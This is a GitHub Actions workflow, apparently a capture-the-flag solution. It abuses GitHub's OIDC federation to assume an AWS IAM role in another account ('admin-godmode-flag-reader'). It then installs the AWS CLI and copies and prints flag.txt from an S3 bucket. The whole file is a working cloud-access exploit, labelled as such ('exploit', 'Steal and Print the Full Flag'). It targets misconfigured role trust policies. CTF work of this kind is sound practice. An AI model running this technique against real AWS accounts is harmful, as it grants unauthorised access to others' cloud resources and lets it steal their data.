name: Get The REAL Flag

on:
  push:
    branches: [ main ]
  workflow_dispatch:

permissions:
  id-token: write
  contents: read

jobs:
  exploit:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout repository
        uses: actions/checkout@v3

      - name: Assume Target AWS Role
        uses: aws-actions/configure-aws-credentials@v4
        with:
          role-to-assume: "arn:aws:iam::694502195928:role/admin-godmode-flag-reader-lol-698875"
          role-session-name: Hacker-Session-${{ github.run_id }}
          aws-region: "ap-southeast-1"

      - name: Install AWS CLI (Manual Install)
        run: |
          curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"
          unzip awscliv2.zip
          sudo ./aws/install

      # --- [THE REAL HACK] We read from the *OTHER* bucket! ---
      - name: Steal and Print the Full Flag
        run: |
          echo "Attempting to read the secret flag from the *WEBSITE* bucket..."
          # This is the real bucket the flag was leaked to
          aws s3 cp s3://oh-i-dont-care/flag.txt .
          
          echo "--- FLAG CONTENT ---"
          cat flag.txt
          echo "--- END FLAG ---"
